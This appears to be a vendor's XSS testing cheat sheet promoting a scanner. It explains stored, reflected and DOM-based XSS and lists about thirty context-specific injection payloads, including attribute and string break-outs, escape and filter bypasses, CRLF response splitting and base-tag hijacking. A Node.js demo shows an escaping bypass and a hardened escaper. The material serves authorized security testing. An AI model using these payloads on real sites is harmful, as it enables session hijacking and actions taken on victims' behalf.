Use this XSS cheat sheet to find cross-site scripting vulnerabilities faster, even if you are not a security expert.
What is XSS?
Cross-site scripting (XSS) is a common web application vulnerability that lets an attacker inject script into a page so that it runs in a victim's browser with the privileges of the vulnerable site's origin. The injected script can read cookies that are not marked HttpOnly and any other data of that origin, hijack sessions, modify page content, or perform actions on behalf of the user.
There are three main XSS types:
- Stored XSS: the malicious input is saved on the server (a comment, a profile field, a file name) and served to other visitors later.
- Reflected XSS: the payload is echoed back in the immediate response to the request that carries it, typically through URL parameters or form input, so the victim has to be made to send that request.
- DOM-based XSS: client-side JavaScript reads attacker-controlled data (such as location.hash or a query string) and writes it to a dangerous sink such as innerHTML or eval; the server may never see the payload.
How to use this cheat sheet
These payloads are designed to trigger a JavaScript alert dialog, usually alert(1), as a harmless proof that injected script executes. If the input vector is vulnerable, the browser runs the payload and shows the dialog.
Typical test vectors include:
- URL query strings and fragment parameters
- HTML form fields and search boxes
- HTTP headers such as Referer or User-Agent
- File upload metadata or JSON request bodies
Testing workflow
- Identify an input vector.
- Inject a payload into the parameter (or first a harmless unique marker, to see where and how the value is reflected).
- Submit the request or reload the page.
- Look for the browser alert or other unexpected script execution.
Testing strategy and limitations
1. Brute-force payload testing
Using a payload list means trying one payload after another until one succeeds.
Drawbacks of brute-force XSS testing:
- Manual testing is time-consuming.
- Automation still needs many requests and can be slow across a large site.
- Repeating many payloads increases the chance of detection and blocking by a Web Application Firewall (WAF).
- Real applications may require custom encoding, escaping, or context-specific payloads; a payload built for an HTML body context does nothing inside a JavaScript string.
- This cheat sheet is a starting point, not a complete WAF evasion guide.
⚠️ Warning: Use this guide only on applications you own or are authorized to test. Unauthorized scanning or exploitation is illegal and unethical.
2. Use a smarter approach with SmartScanner
SmartScanner automates XSS detection and reduces the need for manual payload enumeration. It analyzes the application context, tests the right vectors, and reports high-confidence XSS vulnerabilities quickly.
Find XSS in your website with SmartScanner
Common XSS payloads
Below are common payloads to test for reflected and DOM-based XSS. Many applications will accept variations, so adapt them to the target context.
| Payload | Comment |
|---|---|
| `<script>alert(1)</script>` | Classic script-tag injection in an HTML body context |
| `<svg/onload=alert(1)>` | Event-handler payload for an HTML body context; fires without user interaction, and the `/` stands in for the space |
| `<a href=javascript:alert(1)>click me</a>` | Link payload for an HTML body context; fires when the victim clicks |
| `"><svg/onload=alert(1)>` | Break out of a double-quoted attribute and its tag |
| `'><svg/onload=alert(1)>` | Break out of a single-quoted attribute and its tag |
| `</script><svg/onload=alert(1)>` | Close the enclosing script block; works even from inside a JS string or comment, because the HTML parser ends the script at `</script` |
| `javascript:alert(1)` | URL-based XSS where the input becomes the whole value of a URL attribute such as `href` or an iframe `src` |
| `"autofocus/onfocus="alert(1)` | Inject an event handler inside a double-quoted attribute without leaving the tag; `autofocus` makes the handler fire without interaction |
| `'autofocus/onfocus='alert(1)` | Same for a single-quoted attribute |
| `</textarea><svg/onload=alert(1)>` | Break out of textarea content, where tags are inert until the element is closed |
| `</title><svg/onload=alert(1)>` | Break out of the title element (also raw text) |
| `</noscript><svg/onload=alert(1)>` | Close a noscript block, whose content is ignored while scripting is enabled |
| `</style><svg/onload=alert(1)>` | Close a style block so the rest is parsed as HTML |
| `alert(1)` | Minimal payload when the input lands directly in JavaScript code, outside any string |
| `${alert(1)}` | Template-literal interpolation when the input lands inside backticks |
| `'-alert(1)-'` | Close a single-quoted JS string, run the expression, then reopen the string so the statement stays valid |
| `"-alert(1)-"` | Same for a double-quoted JS string |
| `\'-alert(1)//` | Defeats quote-only escaping: the backslash the application adds in front of your quote is itself escaped by yours, so the quote closes the string; `//` comments out the rest of the line |
| `\"-alert(1)//` | Same for a double-quoted JS string |
| `\";alert(1)//` | Same, using a statement separator instead of an arithmetic operator |
| `` `-alert(1)-` `` | Close and reopen a template literal |
| `` \`-alert(1)// `` | Backslash-escape bypass for a template literal |
| `%26apos;-alert(1)-%26apos;` | URL-encoded `&apos;`; works when the JS string sits inside an HTML attribute (an inline event handler), because the browser decodes entities before the script is parsed |
| `/alert(1)//\` | For input reflected twice into one script: the trailing backslash escapes the first closing quote so the string runs on to the second copy, where `/alert(1)//` parses as a division followed by a comment |
| `--><svg/onload=alert(1)>` | Close an HTML comment and inject markup |
| `<!--><svg/onload=alert(1)-->` | Alternate comment break-out: `<!-->` is parsed as an empty comment, so what follows is live HTML |
| `\74img/src/onerror=alert(1)\76` | Octal escapes for `<` and `>` (`\74` = 0x3C, `\76` = 0x3E) inside a JS string whose value is later written into the DOM; bypasses filters that look for literal angle brackets |
| `1%0D%0AContent-Type:text/html%0D%0A<svg/onload=alert(1)>` | CRLF injection where the input is reflected into a response header: splits the response and forces a text/html body containing the payload |
| `"onload="alert(1)` or `"></iframe><svg/onload=alert(1)>` | Attribute injection on an iframe tag, or breaking out of the iframe altogether |
| `javascript://%250Aalert(1)//?1` | JS URI for values that are URL-decoded twice (for example a redirect target): `%250A` becomes a newline that ends the `//` comment, so `alert(1)` runs |
| `[default]"> <svg/onload=alert(1)>` | Replace `[default]` with the parameter's original value so server-side validation still passes |
| `<base/href=//yoursite.com>` | Base-tag injection: relative script URLs on the page now resolve to your host, which serves the payload |
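The backslash rows of the table (`\'-alert(1)//`, `\";alert(1)//`) are the ones that surprise people, so here is the mechanism run end to end. The script below is an added example, not code from this cheat sheet or from SmartScanner: `render` is a hypothetical server-side template that drops user input into a single-quoted JavaScript string, `naiveEscape` is the flawed escaper the payload targets, `jsStringEscape` is a hardened form, and `alert` is replaced by a recording stub so the generated script can be executed in Node.js.

```javascript
// Added example; not code from the original cheat sheet or from SmartScanner.
// Shows why the backslash rows of the table work: a server that escapes only
// the quote character leaves the backslash for the attacker. The generated
// script is executed here with alert() replaced by a recording stub.

// Vulnerable escaper: neutralises ' but not \ (the flaw the payload targets).
function naiveEscape(s) {
  return s.replace(/'/g, "\\'");
}

// Hardened escaper for a JS string literal: every character that could end
// the string, the line, a comment or the surrounding <script> block is
// emitted as a \uXXXX escape, so no input can change the script's structure.
function jsStringEscape(s) {
  return s.replace(/[\\'"`\n\r\u2028\u2029<>\/]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hypothetical server-side template that drops user input into a
// single-quoted JavaScript string and then uses the value.
function render(escapeFn, input) {
  return "var query = '" + escapeFn(input) + "';\n" +
         'return query;';
}

// Run the generated script with alert() stubbed. Returns the arguments every
// alert() call received and the script's return value.
function execute(script) {
  const alerts = [];
  const value = new Function('alert', script)((x) => alerts.push(x));
  return { alerts, value };
}

function probe(escapeFn, input) {
  const script = render(escapeFn, input);
  return { script, ...execute(script) };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const input of ["'-alert(1)-'", "\\'-alert(1)//"]) {
    for (const [name, fn] of [['naiveEscape', naiveEscape], ['jsStringEscape', jsStringEscape]]) {
      const r = probe(fn, input);
      console.log(name, JSON.stringify(input), '->', JSON.stringify(r.script), 'alerts:', r.alerts);
    }
  }
}
```

With `naiveEscape`, the plain `'-alert(1)-'` row is stopped (its quotes become `\'`), but `\'-alert(1)//` becomes `\\'-alert(1)//`: the string now ends after one literal backslash, `-alert(1)` runs as arithmetic, and `//` swallows the leftover quote. With `jsStringEscape` the same input survives unchanged as data and no alert fires. Escaping `<`, `>` and `/` as well is what keeps the `</script><svg/onload=alert(1)>` row from working inside the string, since the HTML parser ends a script block at `</script` regardless of JavaScript quoting.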
Notes
- Adapt each payload to the exact HTML or JavaScript context the input lands in; the same parameter can be reflected in several contexts on one page.
- Use browser developer tools or a proxy to inspect how the payload appears in the raw response, since the rendered DOM may already differ from what the server sent.
- A finding is confirmed when you can point to the place in the response, or in the client-side code for DOM-based XSS, where your input becomes executable; an alert alone is evidence, not the explanation.
- In practice, use any event handler that is valid for the target element, such as onclick, onfocus, oninput, onmouseover, or onmouseenter, instead of relying only on onload and onerror.
- Always test only on targets you are authorized to scan.